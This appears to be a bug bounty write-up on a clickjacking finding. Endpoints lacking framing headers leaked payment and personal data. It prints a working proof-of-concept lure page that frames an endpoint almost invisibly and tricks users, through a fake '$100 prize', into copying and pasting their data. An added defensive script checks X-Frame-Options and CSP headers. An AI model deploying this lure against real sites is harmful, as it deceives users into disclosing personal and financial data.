$1800 worth Clickjacking

Osama Avvan
Jun 21 · 2 min read

In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages where user-sensitive information was disclosed. It was a private program on Bugcrowd.

So there were some API endpoints that were disclosing user information such as credit card data, email, name, phone, address, user ID, etc.

Since none of these endpoints sent an X-Frame-Options header, I was able to load them in an iframe.

Next I had to create an HTML page that tricks the user into leaking their own information. So I created the following HTML page.


<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
</head>
<body>
<div id="parent">

<center><h1 style="color: blue; text-decoration: underline;">Lucky Draw to Win $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style="border: 2px solid gray;">
  <!-- The vulnerable endpoint is framed almost invisibly; CTRL+A / CTRL+C copies its response text -->
  <iframe src="https://example.com/api/v1/wallet/payments?language=en" width="100%" style="opacity: 0.01"></iframe>
</div>

<h3>Click inside the box and press CTRL+V</h3>
<!-- A tiny password field hides whatever the user pastes -->
<input type="password" name="" size="1">
<!-- <textarea rows="1" cols="1" style="resize: none;"></textarea> -->
<button id="btn">Click to Win</button>

</div>

<script>
document.querySelector("#btn").onclick = function() {
  // The pasted content is read from the field and logged to the console, as described below
  console.log(document.querySelector("input").value);
  alert("Congratulation! You have won $100");
};
</script>
</body>
</html>


After performing all the steps, when the user clicks the button, his/her information will be logged in the console.
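The root cause here is that the API responses carried no framing defence at all. The following added example (not code from the original writeup) is a small checker that evaluates a response's headers the way a browser does: CSP `frame-ancestors` takes precedence when present, `X-Frame-Options: DENY` / `SAMEORIGIN` block third-party framing, and the obsolete `ALLOW-FROM` form is ignored by modern browsers and therefore offers no protection. The header sets in `SAMPLES` are constructed for illustration; `fetch_headers()` is a hypothetical helper name built on the standard library for testing endpoints you are authorised to test.

```python
"""Assess whether an HTTP response may be embedded in a cross-origin iframe.

Added example, not code from the original writeup. It checks the two
browser-enforced defences against clickjacking: the X-Frame-Options header and
the Content-Security-Policy frame-ancestors directive. SAMPLES is constructed
for illustration; fetch_headers() is a hypothetical helper name.
"""
from __future__ import annotations

import urllib.request


def _parse_csp(value: str) -> dict[str, list[str]]:
    """Split a CSP header into {directive: [sources]}.

    Browsers honour only the first occurrence of a directive, so later
    duplicates are ignored here as well.
    """
    directives: dict[str, list[str]] = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() not in directives:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def assess_frame_protection(headers: dict[str, str]) -> dict[str, object]:
    """Return {'framable': bool, 'mechanism': str | None, 'reason': str}.

    'framable' is True when an arbitrary third-party page could load this
    response in an iframe, which is the precondition for the attack above.
    """
    def verdict(framable: bool, mechanism: str | None, reason: str) -> dict[str, object]:
        return {"framable": framable, "mechanism": mechanism, "reason": reason}

    lower = {name.lower(): value for name, value in headers.items()}

    # CSP frame-ancestors takes precedence over X-Frame-Options when both exist.
    csp = lower.get("content-security-policy")
    if csp is not None:
        ancestors = _parse_csp(csp).get("frame-ancestors")
        if ancestors is not None:
            sources = [s.lower() for s in ancestors]
            if any(s in ("*", "http:", "https:") for s in sources):
                return verdict(True, "csp", "frame-ancestors permits any origin")
            # 'none', 'self' or an explicit origin list: no arbitrary third party may embed.
            return verdict(False, "csp", "frame-ancestors restricts embedding to: "
                           + (" ".join(ancestors) or "(nothing)"))

    xfo = lower.get("x-frame-options")
    if xfo is None:
        return verdict(True, None,
                       "no X-Frame-Options header and no CSP frame-ancestors directive")
    token = xfo.strip().upper()
    if token in ("DENY", "SAMEORIGIN"):
        return verdict(False, "x-frame-options", f"X-Frame-Options: {token}")
    if token.startswith("ALLOW-FROM"):
        # Obsolete: modern browsers ignore it entirely, leaving the page framable.
        return verdict(True, "x-frame-options",
                       "ALLOW-FROM is obsolete and ignored; use CSP frame-ancestors")
    return verdict(True, "x-frame-options",
                   f"unrecognised value {xfo!r} is ignored by browsers")


# Constructed samples: the first mirrors the writeup's finding (no framing defence at all).
SAMPLES = {
    "vulnerable_api": {"Content-Type": "application/json"},
    "fixed_with_xfo": {"Content-Type": "application/json", "X-Frame-Options": "DENY"},
    "fixed_with_csp": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "csp_wide_open": {"Content-Security-Policy": "frame-ancestors *"},
    "obsolete_allow_from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
}


def fetch_headers(url: str, timeout: float = 10.0) -> dict[str, str]:
    """Fetch response headers for an endpoint you are authorised to test (hypothetical helper)."""
    request = urllib.request.Request(url, method="GET")
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return dict(response.headers.items())


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        result = assess_frame_protection(sample)
        print(f"{name:20s} framable={result['framable']!s:5s} {result['reason']}")
```

Run it as-is to see the verdict for each constructed sample, or call `assess_frame_protection(fetch_headers(url))` against your own endpoints. Note that the check is per response: an API that sets the header on its HTML pages but not on its JSON endpoints is exactly the gap this writeup exploited, so every endpoint that returns per-user data needs the header (or the CSP directive), not just the front end.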

So that was it. Thank you for reading.


Security Researcher, ❤️ To Code. Find me at: https://twitter.com/osamaavvan https://facebook.com/cyber.spidey